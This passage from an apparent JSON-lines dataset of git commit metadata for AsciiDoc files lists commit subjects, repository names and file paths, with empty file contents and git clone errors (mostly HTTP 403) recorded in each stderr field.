-boot,vakninr\/spring-boot,olivergierke\/spring-boot,lenicliu\/spring-boot,deki\/spring-boot,royclarkson\/spring-boot,RichardCSantana\/spring-boot,javyzheng\/spring-boot,jbovet\/spring-boot,pvorb\/spring-boot,kdvolder\/spring-boot,dreis2211\/spring-boot,bijukunjummen\/spring-boot,afroje-reshma\/spring-boot-sample,hqrt\/jenkins2-course-spring-boot,tsachev\/spring-boot,mosoft521\/spring-boot,neo4j-contrib\/spring-boot,mdeinum\/spring-boot,tsachev\/spring-boot,DeezCashews\/spring-boot,habuma\/spring-boot,chrylis\/spring-boot,eddumelendez\/spring-boot,shangyi0102\/spring-boot,kdvolder\/spring-boot,cleverjava\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,jayarampradhan\/spring-boot,jmnarloch\/spring-boot,mdeinum\/spring-boot,jxblum\/spring-boot,cleverjava\/jenkins2-course-spring-boot,dreis2211\/spring-boot,bjornlindstrom\/spring-boot,akmaharshi\/jenkins,xiaoleiPENG\/my-project,lburgazzoli\/spring-boot,olivergierke\/spring-boot,lburgazzoli\/spring-boot,donhuvy\/spring-boot,bbrouwer\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,shangyi0102\/spring-boot,chrylis\/spring-boot,izeye\/spri
ng-boot,bclozel\/spring-boot,linead\/spring-boot,candrews\/spring-boot,philwebb\/spring-boot,jmnarloch\/spring-boot,Nowheresly\/spring-boot,javyzheng\/spring-boot,hello2009chen\/spring-boot,wilkinsona\/spring-boot,jvz\/spring-boot,candrews\/spring-boot,ihoneymon\/spring-boot,deki\/spring-boot,qerub\/spring-boot,isopov\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,rweisleder\/spring-boot,pvorb\/spring-boot,ihoneymon\/spring-boot,afroje-reshma\/spring-boot-sample,deki\/spring-boot,royclarkson\/spring-boot,ihoneymon\/spring-boot,felipeg48\/spring-boot,habuma\/spring-boot,lucassaldanha\/spring-boot,shakuzen\/spring-boot,isopov\/spring-boot,jxblum\/spring-boot,zhanhb\/spring-boot,joansmith\/spring-boot,pvorb\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot-concourse,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot-concourse,neo4j-contrib\/spring-boot,drumonii\/spring-boot,lenicliu\/spring-boot,kdvolder\/spring-boot,htynkn\/spring-boot,yangdd1205\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,royclarkson\/spring-boot,sebastiankirsch\/spring-boot,eddumelendez\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,lburgazzoli\/spring-boot,ollie314\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,joansmith\/spring-boot,vakninr\/spring-boot,michael-simons\/spring-boot,sbcoba\/spring-boot,linead\/spring-boot,chrylis\/spring-boot,i007422\/jenkins2-course-spring-boot,royclarkson\/spring-boot,sbcoba\/spring-boot,rweisleder\/spring-boot,afroje-reshma\/spring-boot-sample,NetoDevel\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,bjornlindstrom\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,neo4j-contrib\/spring-boot,mbogoevici\/spring-boot,eddumelendez\/spring-boot,deki\/spring-boot,joshiste\/spring-boot,herau\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,izeye\/spring-boot,tiarebalbi\/spring-boot,lexandro\/spring-boot,lexandro\/spring-boot,SaravananParthasarathy\/SPSDemo,kdvolder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,nebhale\/spring-boot,scottfrederick\/spring-boot,ilayaperumalg\/spring-boot,felipeg48\/spring-boot,brettwooldridge\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,mbogoevici\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,lenicliu\/spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,Buzzardo\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,DeezCashews\/spring-boot,nebhale\/spring-boot,mosoft521\/spring-boot,sebastiankirsch\/spring-boot,michael-simons\/spring-boot,isopov\/spring-boot,bclozel\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,brettwooldridge\/spring-boot,mbogoevici\/spring-boot,hqrt\/jenkins2-course-spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot,sbcoba\/spring-boot,rweisleder\/spring-boot,herau\/spring-boot,ptahchiev\/spring-boot,isopov\/spring-boot,thomasdarimont\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,mosoft521\/spring-boot,ptahchiev\/spring-boot,mbenson\/spring-boot,lburgazzoli\/spring-boot,akmaharshi\/jenkins,tiarebalbi\/spring-boot,yhj630520\/spring-boot,habuma\/spring-b
oot,bbrouwer\/spring-boot,jayarampradhan\/spring-boot,hello2009chen\/spring-boot,ilayaperumalg\/spring-boot,ilayaperumalg\/spring-boot,linead\/spring-boot,drumonii\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot,Nowheresly\/spring-boot,lenicliu\/spring-boot,michael-simons\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot,joshthornhill\/spring-boot,lenicliu\/spring-boot,sebastiankirsch\/spring-boot,brettwooldridge\/spring-boot,scottfrederick\/spring-boot,drumonii\/spring-boot,bjornlindstrom\/spring-boot,chrylis\/spring-boot,javyzheng\/spring-boot,zhanhb\/spring-boot,qerub\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,tiarebalbi\/spring-boot,jvz\/spring-boot,philwebb\/spring-boot-concourse,wilkinsona\/spring-boot,izeye\/spring-boot,akmaharshi\/jenkins,olivergierke\/spring-boot,yhj630520\/spring-boot,i007422\/jenkins2-course-spring-boot,drumonii\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,bijukunjummen\/spring-boot,chrylis\/spring-boot,bbrouwer\/spring-boot,thomasdarimont\/spring-boot,donhuvy\/spring-boot,royclarkson\/spring-boot,lucassaldanha\/spring-boot,candrews\/spring-boot,felipeg48\/spring-boot,joansmith\/spring-boot,joshiste\/spring-boot,nebhale\/spring-boot,sbcoba\/spring-boot,mbenson\/spring-boot,joansmith\/spring-boot,izeye\/spring-boot,michael-simons\/spring-boot,jbovet\/spring-boot,shangyi0102\/spring-boot,kdvolder\/spring-boot","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76a43b74905fc1c777a46bf086d7e8af7535fcc8","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-repository-elasticsearch","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-repository-elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1510c4e7d04a16abd6d54d90dd1e9c64945a7704","subject":"Update 2017-06-25-Dealing-with-team-rejection.adoc","message":"Update 2017-06-25-Dealing-with-team-rejection.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80d997b73ec8757aa02440a41269e232e314fbca","subject":"Update 2016-04-01-Multiple-libraries-for-assertions-in-your-test-classpath.adoc","message":"Update 
2016-04-01-Multiple-libraries-for-assertions-in-your-test-classpath.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-01-Multiple-libraries-for-assertions-in-your-test-classpath.adoc","new_file":"_posts\/2016-04-01-Multiple-libraries-for-assertions-in-your-test-classpath.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c8a1115af8a3cb1b6358881dae2374c0ee6a051","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"897e9a140fb7f6524bdd9437f68a64e6ed3ad185","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4afc1bd54828075ed5b75f6f5dc3fcadeb0df96f","subject":"Update 2016-06-10-studysite.adoc","message":"Update 2016-06-10-studysite.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-studysite.adoc","new_file":"_posts\/2016-06-10-studysite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bde37e5b4f01407173c4b3c1527738ad2d734ccc","subject":"Create PCU-RISE-2017-slides.adoc","message":"Create 
PCU-RISE-2017-slides.adoc","repos":"pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io","old_file":"_posts\/PCU-RISE-2017-slides.adoc","new_file":"_posts\/PCU-RISE-2017-slides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pcu-consortium\/pcu-consortium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"20d5ac1c06740cba8ea5db7d0bcca7a48ea7abc6","subject":"Hawkular Metrics 0.10.0 - Release","message":"Hawkular Metrics 0.10.0 - Release\n","repos":"lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/11\/30\/hawkular-metrics-0.10.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/11\/30\/hawkular-metrics-0.10.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8275b57b82f42467a8e9c7b640a1c405f0bd14b","subject":"Adding contribution info","message":"Adding contribution info","repos":"Pivotal-Field-Engineering\/ephemerol,Pivotal-Field-Engineering\/ephemerol,Pivotal-Field-Engineering\/ephemerol","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Pivotal-Field-Engineering\/ephemerol.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"982ea08649aa19cb99f60e902195a883657ebd13","subject":"Create 10principles.adoc","message":"Create 10principles.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"10principles.adoc","new_file":"10principles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"2f47bfc2bdc0a8e9ffda4702e6a59ab785c0015b","subject":"Add Asciidoc sample text","message":"Add Asciidoc sample text","repos":"turesheim\/mylyn-docs-examples","old_file":"org.eclipse.mylyn.docs.epub.examples\/loremipsum.adoc","new_file":"org.eclipse.mylyn.docs.epub.examples\/loremipsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/turesheim\/mylyn-docs-examples.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ff8ab62b80f7e5fea752df6abdb62524907ff314","subject":"Update 2016-05-21-test.adoc","message":"Update 2016-05-21-test.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-21-test.adoc","new_file":"_posts\/2016-05-21-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c514a3ac10f745fa13b3c004914c5db83aa6411","subject":"adds training page","message":"adds training page\n","repos":"clojure\/clojure-site","old_file":"content\/community\/training.adoc","new_file":"content\/community\/training.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a52cfd88c664defb24095bc276c661a66cf224ac","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b443f1132480159bb922bfd372596d3075038594","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95f076938a1263052fae4b61c63c64ab9ab59867","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baee7211e9481def80af0982be780c37c956b1f6","subject":"Rename README.md to README.adoc","message":"Rename README.md to 
README.adoc","repos":"camunda\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,camunda\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,langfr\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,langfr\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,camunda\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform","old_file":"spring-boot-starter\/README.adoc","new_file":"spring-boot-starter\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/langfr\/camunda-bpm-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89e274af98f2b5284828c8d41f8778c46a2f196f","subject":"y2b create post The Most Requested Smartphone I've NEVER Featured...","message":"y2b create post The Most Requested Smartphone I've NEVER Featured...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-24-The%20Most%20Requested%20Smartphone%20I've%20NEVER%20Featured....adoc","new_file":"_posts\/2017-12-24-The%20Most%20Requested%20Smartphone%20I've%20NEVER%20Featured....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77f4c99697d720838e68d35def1f6a6067fb48e4","subject":"y2b create post 200 Uploads! + Zelda Skyward Sword Limited Giveaway","message":"y2b create post 200 Uploads! 
+ Zelda Skyward Sword Limited Giveaway","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-13-200-Uploads--Zelda-Skyward-Sword-Limited-Giveaway.adoc","new_file":"_posts\/2011-12-13-200-Uploads--Zelda-Skyward-Sword-Limited-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e416da38142adde7d7028725d8da1dcccaebaa7","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0079e0fa5d74677aed1e84ae919ee7f405ebbed8","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac158903d403b8441cdb06e27e743a3ed6f15846","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cc06f2f409eee0712d74e3951a02ee5c4b15340","subject":"Replaced the RELEASES.md by an asciidoc version.","message":"Replaced the RELEASES.md by an asciidoc version.\n","repos":"jayware\/entity-essentials","old_file":"RELEASES.asciidoc","new_file":"RELEASES.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jayware\/entity-essentials.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7822a771b30643514510d4f255400d947bf37397","subject":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","message":"Update 
2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd54589848eb69f4a5c69c3b9eb49f3d6710390e","subject":"Adding the actual command to build the image and adding a tag, so the output of docker images is the same as the one in the lab","message":"Adding the actual command to build the image and adding a tag, so the output of docker images is the same as the one in the lab\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a30dffe301374fa07eeeecdf1d4ea9e2afad8b2b","subject":"Update 2015-09-18-MatchBox.adoc","message":"Update 2015-09-18-MatchBox.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-18-MatchBox.adoc","new_file":"_posts\/2015-09-18-MatchBox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6922379981195b6c6906b3aa4c9b4a129d32dcfd","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82463d280ddda004331a5f799ace63611058af33","subject":"Eclipse Auto install new version","message":"Eclipse Auto install new version\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0caa5b7cdcc712722c7f80e6dfe76dd4ec5d326","subject":"Update 2017-05-24-i-want-faster-ide.adoc","message":"Update 
2017-05-24-i-want-faster-ide.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-24-i-want-faster-ide.adoc","new_file":"_posts\/2017-05-24-i-want-faster-ide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec8cf08462ca684b99441813c900cd98cdadfede","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b62c1fe2a64c5dd6332f15b61af40e0482bf614d","subject":"Update 2015-05-20-GeeCON-2015-wrap-up.adoc","message":"Update 2015-05-20-GeeCON-2015-wrap-up.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-20-GeeCON-2015-wrap-up.adoc","new_file":"_posts\/2015-05-20-GeeCON-2015-wrap-up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e05a1c43f1dab7f1700d4a3133f71eacd6586228","subject":"Update 2016-09-20-Java-One-2016-Day-1.adoc","message":"Update 2016-09-20-Java-One-2016-Day-1.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2016-09-20-Java-One-2016-Day-1.adoc","new_file":"_posts\/2016-09-20-Java-One-2016-Day-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc852f8ac5f365d2e0d24173a5bc54344768f7de","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The 